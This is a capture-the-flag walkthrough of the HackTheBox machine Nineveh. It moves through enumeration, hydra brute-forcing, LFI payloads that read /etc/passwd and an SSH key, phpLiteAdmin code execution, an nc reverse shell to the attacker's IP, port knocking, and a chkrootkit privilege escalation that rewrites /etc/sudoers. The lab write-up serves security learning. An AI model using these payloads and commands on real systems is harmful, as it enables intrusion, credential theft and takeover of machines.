ENUMERATION

Nmap Scan

Adding nineveh.htb to hosts

80 HTTP ENUMERATION

Visiting website shows

Gobuster Scan and nikto scan

Department

When we try to login as amrois — amrois it says wrong username.When we try to enter admin -admin it says wrong password.Tried SQL injection, but didn’t work. Running a gobuster scan again on department

After enumerating a lot I found there is no option left apart from bruteforcing password. Capture request on burp

Now use hydra and wordlists rockyout.txt

We got the password

Checking notes we see

LFI used further after 443

php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd : works

php://filter/convert.base64-encode/resource=../../../../../../../../home/amrois/.ssh/id_rsa : Gives us file name too long

443 ENUMERATION

Nikto Scan

Gobuster Scan revealed

Visiting /db

After enumerating a lot on phpLiteAdmin, I couldn’t find a good exploit. So we did bruteforce on db/index.php

Capture on burp

Using hydra , we get password : password123 , < run hydra with rockyou.txt for password and username: admin, it doesn’t make a difference, since there is no user defined>

We see we have access to db. And we have an exploit to RCE

Going as per exploit

This did not work on executing LFI, which will be shown with real exploit after a minute. So now instead of making a field with default value containing malicious code. We will create field name containing malicious code

Hack.php doesn’t work, because LFI needs name ninevehNotes

And it worked

EXPLOITATION

For getting shell we will be sending URL encoded reverse shell. I first used URL encoded nc -nv 10.10.14.16 1234 -e /bin/sh. But that didn’t work so. We will use pipe.

GETTING USER

Doing strings command on both we see. Nineveh.png gave ssh keys

So we check knockd.conf to see SSH rules

Simply running SSH on this doesn’t work. So we need to do a nmap scan on each of ports metioned above in same order

PRIVILEGE ESCALATION

We see every mnute a report is generated in report folder accessed by report-reset.sh . Now since this is done by chkrootkit, which is vulnerable to exploit. When there is no valid file name it takes input from /tmp/update.

https://www.exploit-db.com/exploits/33899

So we will manipulate update file in tmp directory (we will make a file /tmp/update) . And ask it to give permission to /etc/sudoers and write amrois in sudoers, which require no auth for running sudo command and again restore permissions of /etc/sudoers

ROOTED !!!

OSCP | CEH | Cyber Security Enthusiast.